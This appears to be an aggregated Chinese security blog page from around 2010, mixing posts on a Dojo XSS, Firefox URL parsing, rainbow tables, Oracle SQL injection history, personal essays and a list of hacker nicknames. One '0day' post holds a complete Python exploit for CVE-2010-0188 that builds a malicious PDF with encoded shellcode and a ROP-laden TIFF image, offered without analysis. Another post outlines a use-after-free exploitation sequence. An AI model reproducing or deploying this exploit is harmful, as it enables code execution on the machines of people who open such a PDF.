http://www.gdssecurity.com/l/b/2010/03/12/multiple-dom-based-xss-in-dojo-toolkit-sdk/
需要注意的是这是框架自己的漏洞,而非利用框架写出的漏洞。
因为js框架本身提供一些功能写入DOM节点,如果程序员自己写错了,这笔账不能记到js框架的头上。
比如jQuery 中提供 html() 直接将html代码插入DOM节点,如果程序员插了个用户能控制的进去,又没有做任何的校验,当然会形成XSS
在这里dojo的这个XSS是Toolkit SDK本身出现的问题。这种问题的影响范围是非常广的。
一直想看看js框架的安全问题,不过没有时间去做这些,先记录下这个漏洞,以备参考。
阅读全文
类别:象牙塔 查看评论
http://www.cgisecurity.com/2010/03/random-firefox-url-handling.html
我在我的firefox 3.6上测试通过
以下是转载:
About a year ago I discovered this by accident and hadn't seen it published anywhere so thought it was worth mentioning. If you enter the following into the firefox URL bar it will follow them to www.cnn.com.
- [http://www.cnn.com]
- [http://]www.cnn.com
- [http://www].cnn.com
- Etc...
You can also substitute [] for {} or " and it will also work (I haven't bothered enumerating/posting each one, but you get the idea). Now if you hyperlink using the following link it will follow them.
Maybe someone will find this useful in some way :)在我看来这几个特性是很有用的。一些IDS的规则又需要更新了~~
浏览器自己整的一些功能,总是会给IDS规则带来各种麻烦
比如上次我提到的IE %5c的问题也是如此。
阅读全文
类别:象牙塔 查看评论
见义勇为者: To Be or Not To Be?
郑三炮个人安全防卫讲座前五讲分别是《你知道怎样保护你吗?》、《当你与罪犯擦肩而过……》、《当你与罪犯狭路相逢……》、《面对人生最险恶的危机》和《如何对付日益增多的窃贼》,第六讲拖了许久才写,不是光是因为忙,还因为有些话题说起来比较敏感,所以总是有些迟疑。最近一篇新闻引起我的注意,《父女路遇3名小偷报警 民警反称不提倡见义勇为》。显然,让人们关注和争论的事情是文章标题的后半句。报道说,当事人女儿在网上发帖,父亲见义勇为遭歹徒割伤,而接案民警反而说“现在已经不提倡见义勇为了”,但后来派出所否认曾出此言,还给当事人报销了医疗费并发了2000元奖金。
“见义勇为”语出《论语》“见义不为,无勇也”,如果是从这个意思上讲,我认为见义勇为是应当鼓励的。但是今天“见义勇为”被解释成:“指公民为保护国家、集体利益和他人的人身、财产安全,不顾个人安危,同违法犯罪行为做斗争或者抢险、救灾、救人的行为。”(见百度百科)。如果是这种“见义勇为”,那么,本文作为探讨“个人安全”的讲座,鉴于今天的社会环境,我认为不应无条件提倡,虽然此行为被国人认为是中华传统美德。顺便说一下的是,做了美国警察之后,我更觉得,“见义勇为”应该是美利坚传统美德。
我不想展开一个引发道德口水仗的话题。我只是就具体环境说,鼓励(百度百科定义之)“见义勇为”,是一种对公民个体安全极不负责任的精神面子工程。美国社会中,见义勇为的事情很多,市民的支援已经成为警察战术行动体系的一部分,也是法庭搜证的主要部分。警察遇到风险的时候,市民挺身而出,甚至向执法人员提供火力支援并非很新鲜的事情,而在法庭上,市民站出来指证罪犯包括黑帮成员和腐败官员,已经是司法惯例。
但是我并不单单因为这一点便认为美国人比中国人素质更好一些。我认为公民表现的差距主要是来自社会环境的差别。
我们看看美国公民受到的社会保护:第一,美国在宪法和刑法支持公民拥有保护自己和家人以及私人财产不受侵犯的权利和行使这种权利所必须的战术和法律手段。公民合法拥有枪械和战术刀具才能具有见义勇为的本钱和相应的战术素质。第二,美国拥有反应迅速(相对与中国)的执法机构。美国警察的战术单元是24小时不间断巡逻的警车,也就意味着至少拥有一支散弹枪两支手枪,40-50发子弹。平均每1.5万人的居民拥有一辆在岗警车,每次接到紧急报警(如抢劫案)之后,第一辆警车能够在不到1.5分钟之内赶赴现场。而在大都市,都有数十架直升飞机作为空中力量。虽然这种速度,屡遭美国居民诟病,但是对于中国执法机关的快速反应能力,已经是天壤之别。
美国刑法赋予公民逮捕权利。一个公民可以跟执法机关一样行使对罪犯的逮捕权力。当公民对罪犯行使逮捕权之时,对于罪犯的拒捕和反抗行为,所采取的适当武力将属于正当防卫(当然,法庭要在事后裁定公民逮捕的行为合法有效)。
美国执法机关和司法体制对证人的保护是极为严密的,检察官会对报复证人的行为升格起诉。比如普通暴力袭击,因为是针对证人报复,便可以升格成致命武器袭击或者蓄意谋杀,口头威胁升格为恐怖罪。而且政府对于重要证人提供“更换身份”保护。
很显然,从执法能力和执法态度上,我们的社会并没有对 “见义勇为”者提供他们所需要的保护。
我们决不应该忽视民众对见义勇为者的支持,但是遗憾的是,中国见义勇为者的支持者往往存在于虚拟的网络或者媒体上,而在美国,他们的支持者在法庭。可以这么说,一个见义勇为者,哪怕他行为过度(比如南加州曾经发生一个抢劫便利店的歹徒被见义勇为的大汉在逮捕中夹在臂下窒息而死,而后者被裁定无罪),也很难被判罪。因为在法庭,刑事裁决的权力在12个随机选取的平民陪审团手里。而12个陪审团员必须全票通过(!)才能判定一个人有罪。想让12个老百姓全部认为见义勇为者有罪,几乎是不可能的。
在加州阿罕不拉市,一个华人店主在遭到抢劫的时候,愤然拿起AR15(M16的民用版)一阵猛射,打得劫匪弹孔累累。自然他没有遭到起诉。之后,许多警察到他的店参观,他们见到他什么话也不说,只是跟他握手,一切尽在不言中。这是一种强烈的态度。
应当承认“见义勇为”行为会给执法机关带来麻烦,我们在洛杉矶巡逻的时候,接到许多“好事者”报警,90%的情况是误报,但是我们从来不会为了白跑一趟而埋怨报警者,因为我们都知道,只有接受90%的冤枉路,才会有另外10%的宝贵情报。而中国警察出动一趟着实不容易,你“谎报军情”一次看看他们给你什么态度?
首先,你必须会格斗。我指的是徒手格斗,手枪战术射击不算数,当然中国人也没有几个摸过手枪。基本要求是,你对付一个手持利器的人,能够三招之内将其打倒。罪犯一定会深藏利器的,不用想。
其次,你要有强烈战术意识,你学会要随时注意身边的情况。我同意李紫剑的一句话,谁从你的背后接近你,那就打了再说。见义勇为时,你身边出现帮助你的人和罪犯帮凶的几率是一比一万。如果发现对方不是一个人,确定谁是匪首,对那个人要下手狠,决不姑息,你在为自己是生存而战。
第三,你必须跟本地的公安机关有很深的关系。说白了,应该是上头有人。
第四,随身携带可以作为武器的物件。对了,紧急时刻,安装了9芯电池的Thinkpad飞出去效果也不错(注:此处没有给联想做植入)
第五,随身携带好运。那是我的祝福,好人应该有好运。好运应该带在身边。
阅读全文
类别:网文收集 copy and paste 查看评论
最近物联网这个东东貌视很火,昨天晚上看新闻,貌视两会代表都在谈这个东东,今天看到baozi的blog上有一篇:
物联网安全初现苗头,福特汽车WIFI可被入侵
Flashsky大牛写的文章:
Google到了一篇物联网安全的ppt:
因为有点事情,需要操作网银,发现招行网银的几个问题,具体原因不清楚,从现象看,应该是招行在进行版本升级造成的。很可能是没有考虑到Win7和vista的一些特殊性。周日反馈给了招行客服。招行答应周一会给我一个反馈。
也算引以为戒,今后在工作中,变更后的上线前测试,以及版本的灰度放量和影响检测,这3个杀手锏非常重要。
这种流程管理方面的保证,即是技术之外,又是绝对的技术。
比起网银,我们做互联网服务的人,比较幸运。毕竟转账、支付这种事情更敏感,比起QQ盗号,网银故障更容易突破用户的容忍度。
而且一旦一些不好的事情暴露出来(如 漏洞、被黑),对银行商誉、股价的影响极大。
阅读全文类别:业界感悟 查看评论
import sys
import base64
import struct
import zlib
import StringIO
SHELLCODE_OFFSET=1500
TIFF_OFSET=0x2038
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
buf += "\x09\xc1\x5f\x00"
class CVE20100188Exploit:
def __init__(self,shellcode):
self.shellcode = shellcode
self.tiff64=base64.b64encode(self.gen_tiff())
def gen_tiff(self):
tiff = '\x49\x49\x2a\x00'
tiff += struct.pack("<L", TIFF_OFSET)
tiff += '\x90' * (SHELLCODE_OFFSET)
tiff += self.shellcode
tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
tiff += "\x00\x07"
return tiff
def gen_xml(self):
xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
'''
return xml
def gen_pdf(self):
xml = zlib.compress(self.gen_xml())
pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
return pdf
if __name__=="__main__":
print __doc__
if len(sys.argv) != 2:
print "Usage: %s [output.pdf]" % sys.argv[0]
print "Creating Exploit to %s\n"% sys.argv[1]
exploit=CVE20100188Exploit(buf)
f = open(sys.argv[1],mode='wb')
f.write(exploit.gen_pdf())
f.close()
print "[+] done !" 阅读全文
类别:0day 查看评论
Oechslin has fitted an elderly Athlon 64 X2 4400+ with an SSD and the optimised tables. This system can, with only a 75% CPU utilisation, crack a 14 digit password with special characters, in an average of 5.3 seconds. Oechslin says that, worst case, it should be able to search arithmetically through 300 billion passwords per second, a speed that is a factor of 500 faster than an Elcomsoft cracker supported by a modern Tesla GPU from NVIDIA.
Calculations with rainbow tables achieve the acceleration by pre-computing the intermediate steps of all possible password hashes for a specific algorithm and then storing those results as a table. The more steps that are stored, the bigger the tables and the faster the cracking process. Once the tables no longer fit in memory, the less-used parts of the tables are saved on mass storage devices, previously this would have been a hard disk, which in turn leads to slower access times while searching them.
类别:安全检测 查看评论
1) free:
把tear_offs的object放入全局变量,再次创建和释放tear_offs object直到把最初的指针释放掉。
2) reuse object:
多次进行内存分配的请求直到LAL返回释放的指针,并且重用该指针,在我的环境上这个填充值的大小是0x28。
3) call vtable
触发vtable calling获得控制权限。
阅读全文
类别:网络安全 查看评论
2005/02/03 www.argeniss.com的大牛发布《Advanced SQL Injection in Oracle databases》
2007/08/28 kj021320牛发布《ART OF WEB-SQL-INJECTION第2卷 ORACLE篇》
2008/01/12 linx牛发布《犀利的 oracle 注入技术》
2008/03/** 剑心牛发布 《Oracle web环境注射技术》
2009/04/27 Alexander Kornbrust 大牛发布blog《Run OS commands via sql injection in web applications》
sid牛发布blog《Oracle privilege escalations from web app》
2009/08/** sid牛在defcon上演讲《The Making of the 2nd sql injection worm》
2010/02/22 sid牛发布《Hacking Oracle From Web 2》
跨度差不多5年,但是里面的核心技术没怎么提高,05年的时候其实国内就有很多人看到了argeniss的paper了,但是那个时候国内正在mssql注射的技术研究的高潮时期,然后加上oracle的安装要求高,oracle的使用范围想对来说比较少,所以研究的比较少。到了07、08年mssql/mysql等注射技术进入瓶颈时期很少有人有什么新的突破,于是转向其他数据库的研究...
随着挂马技术尤其是那个“伟大”的sql注射的批量挂马,导致近年来老外越来越关注国内的一些脚本小子用的技术,包括blackhat、defcon上都有分析nbsi等工具的paper,于是linx的文章被老外抓到了于是就有了那些文章....
类别:默认分类 查看评论
Surali,2008年8月离开腾讯,2008年10月-2009年3月在云南南伞参与POF(幼儿教育援助)项目;2009年5月-2009年10月在非洲赞比亚成为全职国际志愿者,奉献中国人的爱心;2009年11月,心念腾讯,再次返回腾讯,成为QGQM的一员。
《雨啊,请你到非洲》的韩国作者金惠子曾说过一句话:“爱,在没有付出之前都不算爱。”当我在深圳义工联参加助残活动期间,或许是这句话带给我深深的思考和启示,才有了迈出那一步的勇气。
志愿者,一门高深的大学问南伞,是一个靠近缅甸的云南边远小城,过境缅甸果敢特区,只需要短短几分钟。这是一个典型的集“边、山、少、穷、新” 为一体的边疆县。在这个县,我参加了5个月的POF(Preschools Of the Future)项目的工作。
工作的主要内容就是:前往偏僻边远的自然村落里做基线调查,寻找条件适合的村落开办幼儿班,让村子里3-7岁的适龄儿童能够接受学前教育。运行管理这些幼儿班,定期补充教学、学习和生活用品。每个月对幼儿班老师进行培训指导和监督考核,以此保证和提升幼儿班的教学质量。协助幼儿班老师定期召开学生家长会,及时与他们进行沟通了解孩子的变化情况和需求。为幼儿班筹集运行资金,发动募集捐赠学习用品的活动。
我不是学教育专业的,隔行如隔山,困难时时出现在眼前。我学习唱儿歌、讲故事、做儿童体操,学习儿童心理学、教育学等等,这才体会到,“孩子”两个字不是“小儿科”,而是一门高深的大学问。
美丽而贫穷的非洲
完成了在南伞的项目工作后,我选择去了非洲赞比亚的Serenje地区,加入了Child Aid项目的工作团队。这项工作跟POF项目时大同小异的,同样是开办和运行管理山村幼儿班,不同的是,Child Aid项目多了社区青少年俱乐部和社区发展指导的工作内容。
非洲,大多数人的印象可能都是荒蛮、落后、贫穷、疾病肆虐。然而,真正走进非洲后,你或许会跟我一样有三个感受:其一,确实落后贫穷,生活环境和医疗卫生环境极其恶劣,尤其是边远的很多村落或部落;其二,非洲真美!平原美,瀑布美,而动物横穿马路的壮举则让我目瞪口呆;其三,非洲人不管是生活模式还是思维模式,都很简单,他们乐观、知足。光辉头衔之下的艰苦“志愿者”在许多人眼里是一个光辉而又高尚的头衔,头衔之下却是一种让人说不出道不明的艰苦。走路或骑自行车下乡去村子,累了,摔伤了,就会想起城市里便捷的交通工具;忍受着蚊虫和跳蚤的叮咬,就会想起凉爽的风扇空调和家里干净暖和的被窝;吃着简单粗糙的食物,就会想念曾经吃过的美食……
还有一种很遥远的孤独侵袭而来,与生活条件的好坏无关,与工作的难易无关,只因为置身在云南或赞比亚下乡的山丛小路上,会突然无意识地发现自己曾经的那个世界已经彻底远去,而自己还没有适应那样遥远的距离。
奔波劳苦却不悔
全职志愿者,在我自己看来,它仅仅是一个梦想,一段人生经历。很多人问我:“从这段经历中,你收获了什么?”对此,我也常常思考。
要说收获了什么,我想是“发现”——发现了自己生活中的更多美好和快乐。以前认为只有离开自己所处的固有环境上下求索,才能看清自己的生活定位,现在往上求索比较绝望一点,往下求索却发现自己很富足;以前嫌这个那个不好吃,现在只要米饭够有弹性下饭不是动物腐尸就很满足;以前会抱怨生活的种种不够好,现在只想能够珍惜现有的一切。当然生活的品质还是要逐步有所追求的,只是说对于现有的,不再放过任何一丝可以满足、快乐的理由。尽管已经把微薄的积蓄用得所剩无几,然而我在赞比亚收获的,是比金钱更宝贵的东西,是用来坚实我生活中快乐地基的体验。这或许不是通过照片可以分享到的“客观美”,毕竟每个人有自己的不同的观照自我和感悟的途径。
2009年即将过去,回顾这一年的历程,虽过得奔波劳苦,却不悔。
类别:转载 查看评论
| 作者:中国科学技术信息研究所 武夷山
2008年1月,我将应邀做一场科普报告。在这一报告中,我会讲很多中外科学家的故事,试图通过真实的故事告诉听众,科学家到底是什么样的人,以消除人们关于科学家形象的一些定型化的误解。《澎湃激情》一书的目的与我的目的完全一样:通过对包括7位诺贝尔科学奖得主在内的23位杰出科学家的采访,“尝试着矫正公众对科学家的片面认识”(第1页)。 在西方国家从古到今的文学作品和影视作品中,充斥了大量负面的科学家形象,既有心不在焉、颠三倒四、不食人间烟火的傻乎乎的科学家,又有为了科研不顾一切后果的科学狂人。笔者1993年曾发表“从文艺作品中的科学家形象看反科学思潮”一文,探讨这个问题。为了顺利推动科学事业发展,科学界当然不希望自己的形象被丑化甚至被妖魔化。于是,在科学界的推动下,产生了由英国广播公司制作的这些系列访谈。访谈主持人是伦敦大学学院解剖学和发育生物学系的刘易斯. 沃尔伯特教授。请他当主持人是再合适不过了。他多年来热衷于通过广播电视媒介开展科普,因而于2000年获得皇家科学研究院授予的“法拉第公众理解科学奖”。他还写过《科学的非自然性》等多部科学文化类或科普类著作。1993至1998年期间,他是皇家学会建立的“公众理解科学委员会”的主席。系列访谈节目的监制人是英国广播公司的艾莉森. 里查兹女士,她也是本书的主编之一。 里查兹女士在“导言”中,将被采访的科学家归纳为几种类型:有的是“天真无邪者和局外人”,有的是百折不挠的勇士,有的主要出于兴趣和审美情趣而投身科学,有的受宗教体验等各种无名力量的驱使而进行科学探究,等等。而我阅读此书后的最强烈感受是:这些科学家非常非常的独特:他们有独特的见解,独特的行为,独特的经历。 比如说,曾获诺贝尔化学奖的科学家兼诗人霍夫曼,虽然他所从事的工作——将量子力学应用于化学——属于典型的还原论研究进路,但是他对还原论颇有微词。他说,“我认为还原论是不现实的,它只是科学已经接受的一种意识形态。我认为认识有两种类型——横向认识和纵向认识。纵向认识是还原论认识,或者说是分析。横向认识是按照同一复杂性、同一范畴的概念,在某一领域中理解某一概念”(32页)。一般认为,化学是还原论思想体现得比较突出的一个学科。他在科学营垒的内部发出反对还原论的见解,确实惊世骇俗。 曾因研究开发出避孕药等杰出成就获得过总统科学奖的斯坦福大学化学教授卡尔. 杰拉西的婚恋行为则是相当相当独特。他曾经与斯坦福大学英语系教授戴安娜. 米德尔布鲁克相恋。米德尔布鲁克是大名鼎鼎的文学界名人,是英国皇家文学院院士。后来,米德尔布鲁克又投奔了另一个男人。杰拉西非常恼火,于是决定拿出“男子汉的气概”,在米德尔布鲁克的地盘——文学领域——采取行动,他用公开发表的诗歌来表现自己失恋后的心绪。大约杰拉西的文学才能令米德尔布鲁克大为吃惊和佩服,两人分手一年后再度携手,并正式结婚(16页)。现在,杰拉西不断创作小说和戏剧来反映科学。我曾在2002年发表的“从三类人物看科学和文学的联姻”一文中介绍杰拉西的文学成就,但是,那时我还不知道他原来被文学女友狠狠地踹过一大脚。 要说经历的独特,贾里德. 戴蒙德真是不同凡响。他在细胞膜的行为研究中业绩突出,同时,他还是一个著名的鸟类学家和生态学家,经常在野外考察,在新几内亚的丛林里探险。也就是说,在他身上,大异其趣的数理传统与博物学传统居然和平共处了。他从两种传统那里都汲取了营养,因此,对轻视博物学传统的人很感冒。著名物理学家卢瑟福说过,跑野外的这类生物学家只不过是集邮者。戴蒙德则发出了不平之鸣:“卢瑟福典型地代表了对大量野外生物学家和历史学家的一种故意的、可鄙的、并且最具破坏性的无知”(46页)。他强调说,现代科学、生物学和社会中最重要的问题,都不是实验科学所能解决的问题。正因为他拥有这样的独特经历,受到两种传统的滋养,他才写出了《枪炮、病菌与钢铁:人类社会的命运》这样的脍炙人口的著作。该书获得了普利策奖等多个奖项。我有一位科学根底和文学根底都很深的美国朋友,对此书赞不绝口。 |
类别:转载 查看评论
宾夕法尼亚一位CISO大大因为上周在RSA会议上的发言被解雇.
Pennsylvania fires CISO over RSA talk
Pennsylvania's chief information security officer, Robert Maley, has been fired, apparently for talking publicly at the RSA security conference last week about a recent incident involving the Commonwealth's online driving exam scheduling system
类别:job (安全工作) 查看评论
开了一上午的会,来讨论FilterJS上的一些东西。
公司现在有很多这种情况存在,因为应用太繁杂,前期在测试时发现了很多这样的问题。其实之前很少关注FilterJS方面的东西,对于这一块的安全问题,仅仅是在owasp的一次会议上看到过对淘宝的攻击演示。
google到了一些相关的资料,学习学习。
OWASP ESAPI for Javascript
Javascript 的输入输出,以及二次渲染问题
owasp-esapi-js
Bypassing OWASP ESAPI XSS Protection inside Javascript
记录下,感叹关注面之窄啊。最近老是感觉时间不够用,怎么回事啊
中广网北京3月11日消息(记者李文蕊 实习记者武岩 通讯员王云贵)
3月11日,位于北京顺义杨镇境内的汉石桥湿地自然保护区内近千只“黑客”从天而降,到这里来踏春觅食。湿地工作人员说这些长着黑色羽毛颈部围着“白围巾”的鸟是达乌里寒鸦。
据汉石桥湿地工作人员介绍,当天,他们在办公室里突然听到非常大的鸟叫声,赶快跑出来看个究竟,一片黑压压的鸟群时而在空中盘旋、时而落在远处的树林里觅食。他们小心翼翼的走进鸟群,拍下照片。才发现这些“黑客”叫达乌里寒鸦,属于候鸟,每年春天都会来这里,但今年来的数量是最近几年来的最多的。
为什么今年会飞来这么多呢?湿地科普办的张明娜介绍:在两三年以前,湿地自然保护区刚成立时,这里看不到这么多鸟,2008年以来,湿地保护区内加大植被恢复和环境保护,种植乔木、灌木50余种,近5万棵;种植水生植物22种,3万多平米;在核心区四周设置了总长为7.3公里的围栏; 对河道及周边排水沟进行了治理。湿地的植被自然环境得到了恢复,鸟来的越来越多。现在还不是最多的时候,预计到4月中旬将迎来候鸟来高峰。
阅读全文类别:杂七杂八 查看评论
这两天在准备一份数据报表,需要写几个脚本协助工作,但是追求完美的性格反而导致了一个错误。本来只是一个一次性的工作,在写脚本的时候却妄图去追求通用性,备以后使用,但是而且这个脚本以后基本上是用不上的,结果本来很简单的事情却做了接近3个小时。还好进行到一大半的时候翻然醒悟,快刀斩问题。
抽丝剥茧的分析后,发现是这样一个页面
<embed type="application/x-shockwave-flash" flashvars="vcastr_file=http://nonexists" src="images/Flvplayer.swf">
问题出自这个Flvplayer.swf
后来发现原来是该flash请求视频时,视频地址不断返回403,该播放器又会不断的重新发起网络请求,频率非常高,一段时间后,firefox就crash了。
我把参数 vcastr_file 改成 nonexists 后,也会不断循环网络请求,最终crash。
把swf逆向看了下代码,27000多行,就没继续看了。
推断应该是一个拒绝服务的bug,无法利用。
正常情况下,死循环被dos,比如在javascript里写个死循环,firefox会提示该js导致页面过慢,是否停止。直接crash则属于bug了。
IE无此问题。
阅读全文
类别:象牙塔 查看评论
- 0x37
- 0xfei
- 80sec
- 80sex
- alert7
- amxku
- apollo
- apple
- axis
- ayarei
- azy
- baicker
- bugvuln
- catspar
- chuchengyun
- cjf
- cnhawk
- cnhulk
- cnqing
- cocoruder
- coolc
- CoolQ
- CUIT
- cyg07
- daishuo
- dangguai27
- danielwa
- darkness
- dummy
- evil0x86
- flashsky
- flier
- flowercode
- fuzzfans
- GaRY
- glacier
- greysign
- gz1x
- hackloft
- heizi
- hiheige
- icbm
- jamba1aya
- Kevin
- killvxk
- kj021320
- kkqq
- kruglinski
- kxlzx
- lake2
- lcx
- lewis
- linuxetc
- linx
- lisl03
- luoluo
- met3or
- mix
- mj0011
- mrcool
- neeao
- newbiecoder
- noop
- nuke
- OYXin
- pjf
- putid
- qmzm
- rhett
- ring04h
- robinh00d
- s4m
- sbilly
- Scott&CDrea
- ShadowHider
- shinest
- softrce
- sowhat
- sudami
- suddy
- sunwear
- swan
- sysnap
- tombkeeper
- vessial
- vfocus
- void
- WASGuard
- way7t
- wi4r
- wlj
- wordexp
- woyigui
- www417
- wzt
- xeye
- xi4oyu
- xisigr
- xsolve
- xuanliang
- xyzreg
- ycosxhack
- yuange
- yunshu
- zeta
- zhaohuan
- zhouzhen
- zwell
- zzzevazzz
